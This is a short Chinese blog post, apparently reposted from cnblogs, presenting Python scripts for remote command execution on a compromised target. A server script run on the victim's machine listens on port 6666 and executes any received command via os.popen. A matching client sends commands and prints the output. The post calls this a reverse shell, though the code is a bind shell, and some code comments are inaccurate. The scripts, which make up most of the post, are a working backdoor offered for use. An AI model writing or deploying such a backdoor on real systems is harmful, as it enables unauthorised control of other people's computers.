有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
from socket import *
from os import *
s = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议
s.bind(('', 6666 )) #补丁端口
s.listen( 1 ) #开始监听一个队列
while True :
sock,addr = s.accept() #返回两次 第一次返回连接地址 二 端口号
print ( '客户端:' ,addr)
while True :
cmd = sock.recv( 1024 ) #缓存长度 接收传递过来
cmdstr = cmd.decode()
if cmdstr = = 'exit' :
print ( '客户端:' ,addr, '关闭' )
sock.close()
break
result = popen(cmdstr).read()
sock.send(result.encode())
s.close()
|
本机运行
1
2
3
4
5
6
7
8
9
10
11
12
13
|
from socket import *
from os import *
c = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议
c.connect(( '127.0.0.1' , 6666 )) #连接地址
while True :
cmd = input ( "cmd:" )
c.send(cmd.encode()) #必须传递流
if cmd = = 'exit' :
c.close()
break
data = c.recv( 1014 )
print (data.decode())
|
总结
以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的!
原文链接:https://www.cnblogs.com/yuanzijian-ruiec/archive/2019/06/25/11081385.html